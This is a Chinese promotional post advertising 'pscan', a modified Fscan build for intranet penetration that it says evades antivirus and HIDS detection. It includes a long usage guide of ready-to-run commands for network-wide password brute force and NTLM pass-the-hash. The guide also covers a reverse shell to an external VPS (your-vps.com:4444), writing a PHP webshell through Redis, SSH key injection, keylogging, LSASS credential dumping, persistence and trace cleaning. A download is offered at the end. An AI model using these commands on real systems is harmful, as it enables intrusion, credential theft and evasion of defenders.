0x01 工具介绍
pscan作为红队专属内网渗透新利器,基于Fscan最新版本二次魔改优化,彻底告别原版工具特征暴露问题,完美支持主流安全软件免杀绕过。工具重构全部命令参数、去除官方指纹特征,支持静默无痕迹运行,集内网存活探测、端口扫描、弱口令爆破、POC漏洞检测、后渗透利用功能于一体,实现内网渗透全流程一站式落地,适配各类实战攻防场景。
注意:现在只对常读和星标的才展示大图推送,建议大家把渗透安全HackTwo "设为 星标**⭐️****** "否 则可能就看不到了啦!
下载地址在末尾 #渗透安全HackTwo
0x02 功能介绍
✨魔改版本功能
本版本对原版 fscan 做了以下修改以规避 HIDS 特征检测:
| 修改项 | 说明 |
|---|---|
| 参数名混淆 | 所有命令行参数重命名(见下方映射表) |
| Banner 静默 | 启动时不输出 fscan ASCII Logo 和版本信息 |
| 模块名重命名 | Go 模块路径改为 scanner/core,去除项目名特征 |
| 预编译二进制 | 提供 pscan.exe 和 core.exe 两个版本 |
免杀效果
原版 ↔ 魔改参数映射:
| 原参数 | 魔改后 | 说明 |
|---|---|---|
-h |
-t |
目标 IP / 网段 / 域名 |
-eh |
-et |
排除主机 |
-ehf |
-etf |
排除主机文件 |
-p |
-tp |
端口 |
-ep |
-etp |
排除端口 |
-hf |
-tf |
主机列表文件 |
-pf |
-tpf |
端口列表文件 |
-m |
-st |
扫描模式 |
-t(线程) |
-tn |
端口扫描线程数 |
-time |
-tm |
超时时间(秒) |
-user |
-usr |
用户名 |
-pwd |
-pw |
密码 |
-usera |
-ua |
额外用户名 |
-pwda |
-pa |
额外密码 |
-userf |
-usrf |
用户名字典文件 |
-pwdf |
-pf |
密码字典文件 |
-upf |
-up |
用户名:密码对文件 |
-hashf |
-hf |
哈希文件 |
-hash |
-hv |
哈希值 |
-domain |
-dm |
域名 |
-sshkey |
-sk |
SSH 私钥 |
后渗透插件列表
通过 -local 参数调用:
| 插件名 | 功能 | 平台 |
|---|---|---|
systeminfo |
系统信息收集 | 全平台 |
reverseshell |
反弹 Shell | 全平台 |
forwardshell |
正向 Shell | Windows |
socks5proxy |
启动 SOCKS5 代理 | 全平台 |
keylogger |
键盘记录 | Windows |
minidump |
LSASS 凭据提取 | Windows |
sshkey |
SSH 公钥注入 | Linux |
cleaner |
痕迹清理 | 全平台 |
crontask |
Cron 持久化 | Linux |
systemdservice |
Systemd 服务持久化 | Linux |
ldpreload |
LD_PRELOAD Rootkit | Linux |
winregistry |
注册表持久化 | Windows |
winschtask |
计划任务持久化 | Windows |
winservice |
服务持久化 | Windows |
winstartup |
启动项持久化 | Windows |
winlogon |
登录脚本持久化 | Windows |
winwmi |
WMI 持久化 | Windows |
winbits |
BITS 任务持久化 | Windows |
winifeo |
IFEO 持久化 | Windows |
WebUI 模式
本工具内置了 Web 管理界面(需使用 web 版本编译)。
# 启动 Web 服务pscan-web.exe# 指定监听端口pscan-web.exe -u# 启动后访问 http://127.0.0.1:8080WebUI 功能:
-
图形化扫描任务管理
-
实时 WebSocket 结果推送
-
扫描预设保存
-
资产项目管理
-
多语言支持(中文/English)
-
深色模式
0x03 更新介绍
11 个检测模块:SQLi / XSS / CMDi / LFI / RCE / SSRF / XXE / API / 敏感信息 / WAF / JSPathFinder
支持 GUI 图形界面和命令行两种模式
多种报告格式:JSON / HTML / CSV / Markdown / Console
基于 WVS v19.2 开源更名0x04 使用介绍
📦安装与使用指南
内网扫描
# 全量扫描整个 C 段(最常用)
pscan.exe -t 192.168.1.0/24
# 仅存活探测(快速定位在线主机)
pscan.exe -t 192.168.1.0/24 -ao
# ICMP 模式存活探测
pscan.exe -t 192.168.1.0/24 -st icmp
# 存活探测 + 仅在线主机做端口扫描(跳过离线主机)
pscan.exe -t 192.168.1.0/24 -ao -st all
# 扫描多个网段
pscan.exe -t 192.168.1.0/24,10.10.0.0/16
# 扫描 IP 范围
pscan.exe -t 192.168.1.1-100
# 排除特定主机
pscan.exe -t 192.168.1.0/24 -et 192.168.1.1,192.168.1.254
# 从文件读取目标列表
pscan.exe -tf targets.txt
端口与协议控制
# 扫描指定端口
pscan.exe -t 192.168.1.0/24 -tp 22,80,443,3306,3389,6379
# 扫描常用 Web 端口
pscan.exe -t 192.168.1.0/24 -tp 80,81,443,8080,8443,9090
# 扫描全部端口(慢,谨慎使用)
pscan.exe -t 192.168.1.0/24 -tp 1-65535 -tn 1000
# 排除特定端口
pscan.exe -t 192.168.1.0/24 -etp 445,139
# 跳过 Ping 探测(纯 TCP 扫描,适合禁 Ping 环境)
pscan.exe -t 192.168.1.0/24 -np
# 跳过 TCP 补充探测
pscan.exe -t 192.168.1.0/24 -ntp
# 调整扫描线程和超时(网络差时降低线程数)
pscan.exe -t 192.168.1.0/24 -tn 200 -tm 5
# 限制发包速率(规避流量检测)
pscan.exe -t 192.168.1.0/24 -rate 1000弱口令爆破
# 全量扫描 + 自动爆破(默认开启)
pscan.exe -t 192.168.1.0/24
# 禁用爆破(只扫端口和服务识别)
pscan.exe -t 192.168.1.0/24 -nobr
# 指定自定义凭据
pscan.exe -t 192.168.1.0/24 -usr admin -pw admin123
# 使用字典文件
pscan.exe -t 192.168.1.0/24 -usrf users.txt -pf pass.txt
# 使用用户名:密码对文件(每行 user:pass)
pscan.exe -t 192.168.1.0/24 -up creds.txt
# 添加额外用户/密码(与原字典合并)
pscan.exe -t 192.168.1.0/24 -ua root,admin -pa 123456,password
# 指定域名(用于域认证爆破)
pscan.exe -t 192.168.1.0/24 -dm corp.local
# SSH 私钥登录
pscan.exe -t 192.168.1.100 -sk id_rsa
# NTLM 哈希传递
pscan.exe -t 192.168.1.100 -hv "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"Web 扫描
# 扫描单个 Web 站点
pscan.exe -u http://192.168.1.100:8080
# 扫描多个 URL
pscan.exe -u http://192.168.1.100 -tp 80,443,8080
# 带 Cookie 扫描
pscan.exe -u http://192.168.1.100 -cookie "PHPSESSID=xxx"
# 使用 HTTP 代理
pscan.exe -u http://192.168.1.100 -proxy http://127.0.0.1:8080
# 使用 SOCKS5 代理
pscan.exe -t 192.168.1.0/24 -socks5 socks5://127.0.0.1:1080
# 指定网卡(VPN 场景)
pscan.exe -t 10.8.0.0/24 -iface 10.8.0.5POC 漏洞检测
# 全量扫描 + POC 检测(默认开启)
pscan.exe -t 192.168.1.0/24
# 禁用 POC 扫描(加快速度)
pscan.exe -t 192.168.1.0/24 -nopoc
# 全量 POC 扫描(更全面但更慢)
pscan.exe -t 192.168.1.0/24 -full
# 指定 POC 名称
pscan.exe -t 192.168.1.100 -pocname thinkphp
# 自定义 POC 脚本目录
pscan.exe -t 192.168.1.100 -pocpath ./custom-pocs/
# 调整 POC 并发数
pscan.exe -t 192.168.1.0/24 -num 10
# 启用 DNSLog
pscan.exe -t 192.168.1.0/24 -dns凭据复用与哈希传递
# NTLM 哈希传递(配合爆破模块使用)
pscan.exe -t 192.168.1.100 -hv "31d6cfe0d16ae931b73c59d7e0c089c0"
# 哈希文件批量传递
pscan.exe -t 192.168.1.0/24 -hf hashes.txt
# 复用域用户凭据
pscan.exe -t 192.168.1.0/24 -usr administrator -pw P@ssw0rd -dm corp.local后渗透利用
# 查看所有可用本地插件
pscan.exe -local list
# 收集系统信息
pscan.exe -local systeminfo
# 反弹 Shell(先在外网 VPS 监听)
pscan.exe -local reverseshell -rsh your-vps.com:4444
# 启动正向 Shell(等待目标连接)
pscan.exe -local forwardshell -fsh-port 4444
# 启动 SOCKS5 代理(本地监听 1080)
pscan.exe -local socks5proxy -start-socks5 1080
# Redis 写公钥
pscan.exe -t 192.168.1.100 -st redis -rs "ssh-rsa AAAAB3N..."
# Redis 写 Webshell
pscan.exe -t 192.168.1.100 -st redis -rwp /var/www/html -rwc "<?php system($_GET['cmd']);?>"
# 键盘记录
pscan.exe -local keylogger -keylog-output keylog.txt
# LSASS 凭证提取
pscan.exe -local minidump
# Windows 持久化(启动项)
pscan.exe -local winstartup -win-pe C:\shell.exe
# 清理痕迹
pscan.exe -local cleaner输出控制
# 指定输出文件
pscan.exe -t 192.168.1.0/24 -o scan-result.txt
# JSON 格式输出
pscan.exe -t 192.168.1.0/24 -f json -o result.json
# CSV 格式输出
pscan.exe -t 192.168.1.0/24 -f csv -o result.csv
# 不保存文件,仅屏幕输出
pscan.exe -t 192.168.1.0/24 -no
# 静默模式(减少输出量)
pscan.exe -t 192.168.1.0/24 -silent
# 调试模式(详细日志)
pscan.exe -t 192.168.1.0/24 -debug
# 输出性能统计
pscan.exe -t 192.168.1.0/24 -perf下载
《渗透安全HackTwo》回复20260619获取下载